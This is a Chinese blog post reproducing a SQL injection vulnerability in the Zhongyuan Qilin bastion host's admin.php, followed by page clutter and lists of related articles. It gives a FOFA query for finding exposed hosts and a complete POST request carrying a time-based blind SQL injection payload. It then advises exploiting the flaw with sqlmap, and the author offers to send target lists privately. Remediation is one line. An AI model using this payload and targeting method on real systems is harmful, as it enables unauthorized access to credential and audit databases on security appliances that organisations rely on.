漏洞复现--中远麒麟堡垒机SQL注入

最新推荐文章于 2024-02-26 09:09:24 发布
最新推荐文章于 2024-02-26 09:09:24 发布
阅读量364 收藏 2
点赞数
分类专栏: 漏洞复现 文章标签: 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53003652/article/details/133623560
版权

免责声明:

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!

一:漏洞描述

麒麟堡垒机用于运维管理的认证、授权、审计等监控管理,在该产品admin.php处存在SQL 注入漏洞

二:漏洞影响版本

–中远麒麟堡垒机

三:网络空间测绘查询

fofa语句:
cert.subject=“Baolei”
image.png
需要下载的可后台私我我发你

四:漏洞复现

POC:

POST /admin.php?controller=admin_commonuser HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 78
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

username=admin' AND (SELECT 12 FROM (SELECT(SLEEP(5)))ptGN) AND 'AAdm'='AAdm

image.png
盲注5s
image.png
漏洞存在,sqlmap直接利用
image.png
image.png

五:修复方案

自行寻找厂家发布的安全补丁,若暂无补丁,尽快将系统放入内网。

芝士土包鼠
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
中远麒麟堡垒admin_commonuserSQL注入漏洞
xiaokp7的博客
09-13 422
中远麒麟依托自身强大的研发能力,丰富的行业经验,自主研发了新一代软硬件一体化统一安全运维平台一-iAudit 统一安全运维平台。该产品支持对企业运维人员在运维过程中进行统一身份认证、统一授权、统一审计、统一监控,消除了传统运维过程中的盲区,实了运维简单化、操作可控化、过程可视化,是企业 IT 内控最有效的管理平台。中远麒麟堡垒admin.php接口处存在sql注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
中远麒麟堡垒SQL注入漏洞
The current road is different, love needs to distinguish between right and wrong
11-07 415
中远麒麟堡垒用于运维管理的认证、授权、审计等监控管理,在该产品admin.php处存在SQL 注入漏洞。没有人规定,一朵花一定要成长为向日葵或者玫瑰。
堡垒SQL注入漏洞
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
09-06 699
中远麒麟堡垒能够提供细粒度的访问控制,最大限度保护用户资源的安全。麒麟堡垒存在SQL注入漏洞漏洞漏洞等级高危漏洞影响中远麒麟堡垒FOFA。
中远麒麟堡垒管理员手册1
08-03
5.2.1 添加用户 15 5.2.2 批量添加用户 17 5.2.3 批量编辑用户 18 5.10 5.11 5.12 5.12.1 应用发布服务器 29 5
北京中远麒麟堡垒某接口存在SQL 注入漏洞-1day未公开漏洞
最新发布
weixin_43167326的博客
02-26 597
中远麒麟堡垒是一款集堡垒、运维审计、权限管控、风险分析、日志分析等功能于一体的安全运维审计系统。SQL注入是一种常见的网络攻击手段,攻击者可以通过在输入字段中插入恶意的SQL代码,从而绕过应用程序的安全制,对数据库进行非法操作,如读取、修改、删除数据等。
中远麒麟堡垒软部署
QuJJan的博客
01-17 1135
添加软件源,这里添加的是阿里源(yum-config-manager --add https://mirrors.aliyun.com/centos-stream/9-stream/Baseos/x86_64/os)Rocky配置阿里云源(wget -O /etc/yum.repos.d/Rocky-BaseOS.repo http://mirrors.aliyun.com/repo/Centos-8.repo)套壳并运行直接输入的命令1.(bash yum.sh)2.(bash install.sh)
麒麟堡垒代码审计
jary__D的博客
11-27 525
一次针对PHP堡垒的代码审计
中远麒麟堡垒手册V1.6.docx
07-16
中远麒麟堡垒手册V1.6》是关于中远麒麟堡垒的详细操作指南,旨在帮助用户正确安装和管理这款系统。堡垒是一种专用于安全审计和访问控制的设备,它在网络安全中扮演着重要角色,尤其在管理远程服务器的访问时...
安卓应用-教育学习-华建中远培训平台 v1.6.2 安卓版.apk.zip
09-15
安卓应用-教育学习
房屋分析报告-上海市中远两湾城138号楼标准住宅(标准版).pdf
03-10
上海中远两湾城标准版房屋分析报告
中远变频器在风节能应用的解析
10-22
目前在我国各行各业的各类械与电气设备中与风水泵配套的电约占全国电量的65%,耗用电能约占全国发电总量的五分之二。并且大多数风、水泵在使用过程中都存在大马拉小车的象。因生产、工艺及气温等方面...
麒麟开源堡垒安装部署测试及优缺点总结
cijia1963的博客
04-04 408
近期出于管理和检查需要,单位领导要求上堡垒系统,测试了几个商业堡垒,因为价格超过预算等原因都未购买,又测试了三个开源的堡垒,感觉麒麟开源堡垒功能最全,基本上和商业堡垒一样,唯一的问题就是图形部分不开源,但因为我们的服务器基本上全是LINUX环境,TELNET、SSH、FTP、SFTP...
堡垒哲学史 | 三个问题:堡垒从哪里来?到哪里去?是什么?
qizhitech的博客
06-13 2294
堡垒哲学史 三个问题:堡垒从哪里来?到哪里去?是什么? 作者:gogo 一、缘起:堡垒从哪里来? ——无风不起浪,从需求中来 2005年,中国,我在某互联网公司的安全部门,面临3个问题。 1. 运维部门的需求 那时候,数据中心的运维管理人员的技术水平还处于“社会主义初级阶段“,经常会出一些低级的误操作,导致网站突然无法正常访问,解决问题基本靠在人堆里吼一声”谁TM干的”。痛苦在于,误操...
什么是堡垒?个人经验推荐优质堡垒
weixin_33769207的博客
11-02 515
1.前言笔者曾经在国内某ERP厂商担任过产品经理,就职于某互联网公司担任运维主管,对堡垒的选型及具体应用实践有一定的发言权,故形成此文,权当抛砖。2.堡垒是用来解决“运维混乱”的堡垒是用来干什么的?简而言之一句话,堡垒是用于解决“运维混乱”的。何谓运维混乱?当公司的运维人员越来越多,当需要运维的设备越来越多,当参与运维的岗位越来越多样性,如果没有...
运维管理---开源堡垒介绍
FeelTouch Labs
05-13 4265
JumpserverJumpserver 是全球首款完全开源的堡垒,使用GNU GPL v2.0开源协议,是符合4A(认证Authentication、账号Account、授权Authorization、审计Audit)的专业运维审计系统。Jumpserver 使用Python / Django 进行开发,遵循 Web 2.0 规范,配备了业界领先的 Web Terminal 解决方案,交互界面...
尝试麒麟开源堡垒遇到的几个小问题
运维小菜鸡的学习笔记
11-09 3924
最近因为安全审计需要最近尝试了一下麒麟开源堡垒,,记录一下遇到的一些问题。 网卡:我选择的直接使用官方镜像(比较无脑),创建虚拟时记得配双网卡,IP地址只需要修改100段那张。 ssh端口:2288 root/blj2015BLJ web https://ip admin/12345678 终端用户需要安装VC++2010运行库,然后在堡垒web下载堡垒插件。缺少上述组建无法调用
堡垒
马踏飞燕
11-26 586
原理 问世原因 类型 网关型堡垒 运维审计型堡垒 功能 工作原理 使用人员原理  在一个特定的网络环境下,为了保障网络和数据不受来自外部和内部用户的入侵和破坏,而运用各种技术手段实时收集和监控网络环境中每一个组成部分的系统状态、安全事件、网络活动,以便集中报警、及时处理及审计定责。问世原因1、多个用户使用同一个账号。 2、一个用户使用多个账号。 3、缺少统一的权限管理平台。 4、无法制定统
堡垒麒麟堡垒FTP/SFTP 审计文件、数据库备份测试文档
keeplifer的博客
03-19 1809
        麒麟堡垒可以把日志、数据库定时自动备份到一台ftp/sftp服务器上,ftp/sftp备份服务器建议使用linux系统,因为录相文件中包含了时间、日期等字符串,windows中很多字符不允许。        另外,建议使用sftp服务,sftp服务为加密方式,使用更安全并且方便。        程序/home/wuxiaolong/5_backup/backup_replay.p...
麒麟堡垒SSH/TELNET命令操作列表限制功能测试
keeplifer的博客
09-28 2979
     麒麟堡垒命令限制列表支持白名单、黑名单二种模式,白名单绑定给用户的权限时,则用户使用相应的权限时,只能运行白名单中的命令,黑名单中的命令包括断开连接、命令阻断、命令权限、命令授权四个模式,断开连接的命令,当用户运行时,堡垒会直接将ssh/telnet命令切断,命令阻断的命令,用户运行时,会将这个命令阻断,但不切断连接,命令权限中的命令,用户运行时,堡垒不进行任何阻断动作,但是会记录...
GB/T14429-93远动设备及系统术语标准详解
远动设备及系统术语是中国国家标准GB/T14429-93中定义的一系列专业词汇,用于规范和统一电力系统中远动技术的相关概念。这些术语涵盖了远动技术的主要方面,包括遥测、遥信、遥控、遥调等核心功能,旨在为电力系统的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

芝士土包鼠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值